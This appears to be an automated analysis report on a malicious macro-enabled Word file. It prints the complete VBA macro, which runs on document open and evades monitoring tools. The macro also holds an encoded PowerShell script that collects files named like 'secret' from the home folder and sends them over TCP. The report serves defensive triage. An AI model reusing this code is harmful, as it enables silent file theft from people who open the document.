Office (OOXML) malware analysis — malicious · fa5f065a64aeb893

MALICIOUS

Office (OOXML)

38.6 KB Created: 2021-01-13 17:46:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-07-02

MD5: 347c32d07e7f2050dcb31a05e2848245 SHA-1: 1ee8d8e897f106d9f6d9aa1cadf1b2c1ac784e2f SHA-256: fa5f065a64aeb8939a9d86fffc98ac2ffae99f156fbe37e8e471c1704b6a1e24

280 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell T1059.003 Windows Command Shell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro that executes a 'Document_Open' subroutine. This subroutine attempts to run a 'ping www.google.com' command to check for internet connectivity. If successful, it proceeds to decode and execute a PowerShell command, likely to download and run a second-stage payload. The use of WScript.Shell, CreateObject, and direct references to cmd.exe and PowerShell strongly indicate a malicious intent to execute arbitrary code.

Heuristics 10

VBA project inside OOXML medium 7 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

        command = "Powershell.exe -ExecutionPolicy ByPass -File " & filePath
        Set WsShell = CreateObject("WScript.Shell")
        WsShell.Run command, 0

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA

Matched line in script

        ' Saves decrypted data to powershell file
        decryptedMsg = DecodeBase64(randomData)

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

        command = "Powershell.exe -ExecutionPolicy ByPass -File " & filePath
        Set WsShell = CreateObject("WScript.Shell")
        WsShell.Run command, 0

cmd.exe reference in VBA high OLE_VBA_CMD

cmd.exe reference in VBA

Matched line in script

    ' This part saves command's output to a temporary file
    WshShell.Run "cmd /c " & command & " > " & filePath, 0, True
    With CreateObject("Scripting.FileSystemObject")

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Attribute VB_Customizable = True
Sub Document_Open()
    Main
```

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

    ' Gets path of current user's desktop
    desktop = "C:" & Environ("HOMEPATH") & "\Desktop\"
    res = runHiddenCmd("ping www.google.com")

Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	5372 bytes
SHA-256: `5e2bab18f95a8a30a3fd792e0126d74b48e1626530b6afdafea4f4000badffb4`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 13 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() Main End Sub Attribute VB_Name = "Module1" Public desktop As String Sub Main() Dim res As String, flag As Boolean ' Gets path of current user's desktop desktop = "C:" & Environ("HOMEPATH") & "\Desktop\" res = runHiddenCmd("ping www.google.com") ' Checks if the current enpoint is connected to the internet If InStr(res, "Approximate round") > 0 And canIRun() Then Dim randomData As String, decryptedMsg As String, filePath As String Dim WsShell As Object, command As String randomData = "RnVuY3Rpb24gU2VuZC1UQ1BNZXNzYWdlIHsgCiAgICBQYXJhbSAoIAogICAgICAgICAgICBbUGFyYW1ldGVyKE1hbmRhdG9yeT0kdHJ1ZSwgUG9zaXRpb249MCld" & _ "CiAgICAgICAgICAgIFtWYWxpZGF0ZU5vdE51bGxPckVtcHR5KCldIAogICAgICAgICAgICBbc3RyaW5nXSAKICAgICAgICAgICAgJEVuZFBvaW50CiAgICAgICAgLCAKICAgICAgICAg" & _ "ICAgW1BhcmFtZXRlcihNYW5kYXRvcnk9JHRydWUsIFBvc2l0aW9uPTEpXQogICAgICAgICAgICBbaW50XQogICAgICAgICAgICAkUG9ydAogICAgICAgICwgCiAgICAgICAgICAgIFtQYX" & _ "JhbWV0ZXIoTWFuZGF0b3J5PSR0cnVlLCBQb3NpdGlvbj0yKV0KICAgICAgICAgICAgW3N0cmluZ10KICAgICAgICAgICAgJE1lc3NhZ2UKICAgICkgCiAgICBQcm9jZXNzIHsKICAgICAgI" & _ "CAjIFNldHVwIGNvbm5lY3Rpb24gCiAgICAgICAgJElQID0gW1N5c3RlbS5OZXQuRG5zXTo6R2V0SG9zdEFkZHJlc3NlcygkRW5kUG9pbnQpIAogICAgICAgICRBZGRyZXNzID0gW1N5c3RlbS" & _ "5OZXQuSVBBZGRyZXNzXTo6UGFyc2UoJElQKSAKICAgICAgICAkU29ja2V0ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCRBZGRyZXNzLCRQb3J0KSAKICAgIAog" & _ "ICAgICAgICMgU2V0dXAgc3RyZWFtIHdydGllciAKICAgICAgICAkU3RyZWFtID0gJFNvY2tldC5HZXRTdHJlYW0oKSAKICAgICAgICAkV3JpdGVyID0gTmV3LU9iamVjdCBTeXN0ZW0uSU8uU3R" & _ "yZWFtV3JpdGVyKCRTdHJlYW0pCgogICAgICAgICMgV3JpdGUgbWVzc2FnZSB0byBzdHJlYW0KICAgICAgICAkTWVzc2FnZSB8ICUgewogICAgICAgICAgICAkV3JpdGVyLldyaXRlTGluZSgkXykK" & _ "ICAgICAgICAgICAgJFdyaXRlci5GbHVzaCgpCiAgICAgICAgfQogICAgCiAgICAgICAgIyBDbG9zZSBjb25uZWN0aW9uIGFuZCBzdHJlYW0KICAgICAgICAkU3RyZWFtLkNsb3NlKCkKICAgICAgIC" & _ "AkU29ja2V0LkNsb3NlKCkKICAgIH0KfQoKJGZpbGVzID0gR2V0LUNoaWxkSXRlbSAkSE9NRSAtUmVjdXJzZSAtRmlsZQoKZm9yZWFjaCAoJGZpbGUgaW4gJGZpbGVzKXsKICAgICRmaWxlTmFtZSA9I" & _ "CRmaWxlLk5hbWUKICAgIGlmICgkZmlsZU5hbWUgLWxpa2UgJypzZWNyZXQqJyl7CiAgICAgICAgd3JpdGUtaG9zdCAkZmlsZW5hbWUKICAgICAgICAkZGF0YSA9ICQoR2V0LUNvbnRlbnQgLVBhdGggJ" & _ "GZpbGUuRnVsbE5hbWUpCiAgICAgICAgJG1zZyA9ICJGaWxlIG5hbWU6ICQoJGZpbGVOYW1lKWBuRGF0YTogJCgkZGF0YSkiCiAgICAgICAgU2VuZC1UQ1BNZXNzYWdlIC1Qb3J0IDIwMjAgLUVuZHBvaW" & _ "50IDEyNy4wLjAuMSAtbWVzc2FnZSAkbXNnCiAgICB9Cgp9CgpSZW1vdmUtSXRlbSAtTGl0ZXJhbFBhdGggIiQoJFBTU2NyaXB0Um9vdClcbm90TWFsLnBzMSIgLUZvcmNlCg==" ' Saves decrypted data to powershell file decryptedMsg = DecodeBase64(randomData) filePath = desktop & "notMal.ps1" createFile decryptedMsg, filePath ' Executes ps file (file deletes itself automatically) :) command = "Powershell.exe -ExecutionPolicy ByPass -File " & filePath Set WsShell = CreateObject("WScript.Shell") WsShell.Run command, 0 End If End Sub Function runHiddenCmd(command As String) Dim filePath As String, strOutput Dim fso As Object, WshShell As Object filePath = desktop & "out.txt" Set WshShell = CreateObject("WScript.Shell") ' This part saves command's output to a temporary file WshShell.Run "cmd /c " & command & " > " & filePath, 0, True With CreateObject("Scripting.FileSystemObject") strOutput = .OpenTextFile(filePath).ReadAll() .deleteFile filePath End With ' Returns cmd output runHiddenCmd = strOutput End Function Function DecodeBase64(b64$) ' Function decodes b64 variable Dim b With CreateObject("Microsoft.XMLDOM").createElement("b64") .DataType = "bin.base64": .Text = b64 b = .nodeTypedValue With CreateObject("ADODB.Stream") .Open: .Type = 1: .Write b: .Position = 0: .Type = 2: .Charset = "utf-8" DecodeBase64 = .ReadText .Close End With End With End Function Function createFile(data As String, filePath As String) Dim fso As FileSystemObject, fileStream As TextStream Set fso = New FileSystemObject ' Here the actual file is created and opened for write access Set fileStream = fso.CreateTextFile(filePath) fileStream.WriteLine data ' Close it, so it is not locked anymore fileStream.Close End Function Function canIRun() ' Function checks is process' are currently running Dim res As String, diskSpace As String, Itm As Variant Dim badProc As Variant ' tools list badProc = Array("procexp.exe", "procexp64.exe", "Taskmgr.exe", "Procmon.exe", "Procmon64.exe") res = runHiddenCmd("tasklist") ' check if one of them appears in tasklist output - which means it's running For Each Itm In badProc If (InStr(res, Itm) > 0) Then canIRun = False Exit Function End If Next Itm canIRun = True End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	33792 bytes
SHA-256: `a7309a86fca25be7d41841aea56e4aa52ee1e72c719f21046da53245d132984d`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 13 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.